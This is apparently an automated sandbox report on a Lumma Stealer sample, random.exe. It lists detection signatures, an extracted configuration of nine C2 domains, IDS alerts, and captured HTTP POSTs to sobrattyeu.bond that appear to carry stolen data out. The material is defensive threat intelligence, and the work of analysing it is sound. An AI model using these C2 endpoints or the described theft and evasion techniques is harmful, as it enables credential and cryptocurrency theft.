Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1590613
MD5:	ffa93eb02619db4261ca8e263fb667ce
SHA1:	9dd5e3e90bd54a223ba3a4963c67465f33ff64b2
SHA256:	88aad531c777e07dbb4bf6309cbc7b94436b377207a0b4c122f3b418d8160216
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

random.exe (PID: 2472 cmdline: "C:\Users\user\Desktop\random.exe" MD5: FFA93EB02619DB4261CA8E263FB667CE)

random.exe (PID: 5332 cmdline: "C:\Users\user\Desktop\random.exe" MD5: FFA93EB02619DB4261CA8E263FB667CE)

WerFault.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 912 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["jarry-fixxer.bond", "stripedre-lot.bond", "pain-temper.bond", "growthselec.bond", "immolatechallen.bond", "crookedfoshe.bond", "strivehelpeu.bond", "jarry-deatile.bond", "sobrattyeu.bond"], "Build id": "7tx2jo--925"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: random.exe PID: 5332	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:18:02.360031+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	104.21.96.1	443	TCP
2025-01-14T11:18:03.321724+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	104.21.96.1	443	TCP
2025-01-14T11:18:04.555866+0100	2028371	3	Unknown Traffic	192.168.2.5	49717	104.21.96.1	443	TCP
2025-01-14T11:18:05.577527+0100	2028371	3	Unknown Traffic	192.168.2.5	49718	104.21.96.1	443	TCP
2025-01-14T11:18:06.668015+0100	2028371	3	Unknown Traffic	192.168.2.5	49719	104.21.96.1	443	TCP
2025-01-14T11:18:07.837594+0100	2028371	3	Unknown Traffic	192.168.2.5	49720	104.21.96.1	443	TCP
2025-01-14T11:18:08.947720+0100	2028371	3	Unknown Traffic	192.168.2.5	49721	104.21.96.1	443	TCP
2025-01-14T11:18:11.050851+0100	2028371	3	Unknown Traffic	192.168.2.5	49722	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:18:02.843298+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49713	104.21.96.1	443	TCP
2025-01-14T11:18:03.799706+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49715	104.21.96.1	443	TCP
2025-01-14T11:18:11.552584+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49722	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:18:02.843298+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49713	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:18:03.799706+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49715	104.21.96.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:18:08.162919+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49720	104.21.96.1	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T11:18:08.951996+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49721	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Found malware configuration

Source: 1.2.random.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["jarry-fixxer.bond", "stripedre-lot.bond", "pain-temper.bond", "growthselec.bond", "immolatechallen.bond", "crookedfoshe.bond", "strivehelpeu.bond", "jarry-deatile.bond", "sobrattyeu.bond"], "Build id": "7tx2jo--925"}

Multi AV Scanner detection for submitted file

Source: random.exe

Virustotal: Detection: 48%

Perma Link

Machine Learning detection for sample

Source: random.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-fixxer.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: pain-temper.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: jarry-deatile.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: growthselec.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stripedre-lot.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: immolatechallen.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: crookedfoshe.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: strivehelpeu.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: sobrattyeu.bond
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2085713540.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 7tx2jo--925

Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_004182C0 CryptUnprotectData,	1_2_004182C0
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00415D15 CryptUnprotectData,	1_2_00415D15
Source: C:\Users\user\Desktop\random.exe	Code function: 1_2_00418404 CryptUnprotectData,	1_2_00418404

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49722 version: TLS 1.2

Source: random.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: System.Windows.Forms.pdbH source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: mscorlib.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: System.ni.pdbRSDS source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: mscorlib.ni.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: Kamnler.pdb source: random.exe, WERE46B.tmp.dmp.3.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: Kamnler.pdb(b>b 0b_CorExeMainmscoree.dll source: random.exe
Source:	Binary string: System.ni.pdb source: WERE46B.tmp.dmp.3.dr
Source:	Binary string: System.pdb source: WERE46B.tmp.dmp.3.dr

Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042D420
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov esi, edx	1_2_00408740
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]	1_2_00427A50
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]	1_2_0040BA29
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then push 00000000h	1_2_0040CB44
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00423E44
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [ebx], cl	1_2_0042E002
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [ebx], cl	1_2_0042E002
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	1_2_004161DF
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]	1_2_004251E8
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	1_2_004082A0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then push eax	1_2_00440310
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov eax, dword ptr [00448B08h]	1_2_004273A0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]	1_2_004273A0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then lea eax, dword ptr [esp+50h]	1_2_004273A0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	1_2_00417451
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_00407400
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	1_2_00407400
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h	1_2_0043C410
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then push esi	1_2_0043C410
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0042B430
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	1_2_0042E5C2
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	1_2_004165EE
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	1_2_00415590
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov edx, ecx	1_2_004095A0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	1_2_0041F710
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]	1_2_0041F710
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	1_2_004427E0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042E7EB
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042F799
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	1_2_00429871
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, eax	1_2_0042A810
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then jmp eax	1_2_004288BA
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	1_2_00402940
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]	1_2_0040A910
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then push dword ptr [esp+28h]	1_2_00426A00
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00438AF0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_0041AA90
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [esi], cx	1_2_0041AA90
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]	1_2_0043EB00
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov ecx, eax	1_2_00420B10
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	1_2_0041DC40
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	1_2_00415C25
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then add ebp, edi	1_2_00408CD0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov word ptr [edi], cx	1_2_00426D70
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edx], cl	1_2_0042DD30
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	1_2_00415E42
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	1_2_00413E50
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	1_2_0040DE72
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+79h]	1_2_00425E00
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]	1_2_00425E00
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	1_2_0043EE10
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_00408EB0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	1_2_0041DEB0
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h	1_2_0040DFEA
Source: C:\Users\user\Desktop\random.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0042DFAF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49713 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49713 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49715 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49720 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49721 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: jarry-fixxer.bond
Source: Malware configuration extractor	URLs: stripedre-lot.bond
Source: Malware configuration extractor	URLs: pain-temper.bond
Source: Malware configuration extractor	URLs: growthselec.bond
Source: Malware configuration extractor	URLs: immolatechallen.bond
Source: Malware configuration extractor	URLs: crookedfoshe.bond
Source: Malware configuration extractor	URLs: strivehelpeu.bond
Source: Malware configuration extractor	URLs: jarry-deatile.bond
Source: Malware configuration extractor	URLs: sobrattyeu.bond

Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M4E72L7WH20FB5R446User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12833Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2WWHDW1P4QC3Z3XCCUZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4VUWPAQKW2VRGC8DBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20559Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TT1M2YVI7I2DC5ULKYWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1408Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JJWRCLSW6EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551497Host: sobrattyeu.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: sobrattyeu.bond

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sobrattyeu.bond

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond

Source: random.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: random.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: random.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: random.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: random.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: random.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: random.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: random.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: random.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: random.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: random.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: random.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: random.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: random.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: random.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: random.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: random.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: random.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: random.exe, 00000001.00000002.2153402337.000000000399F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2152844333.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/
Source: random.exe, 00000001.00000002.2153388055.000000000399C000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2152874638.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000001.00000002.2152969955.0000000001368000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/api
Source: random.exe, 00000001.00000002.2152969955.0000000001368000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/apidD
Source: random.exe, 00000001.00000002.2152844333.00000000012D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sobrattyeu.bond/pi
Source: random.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49722 version: TLS 1.2

Source: C:\Users\user\Desktop\random.exe

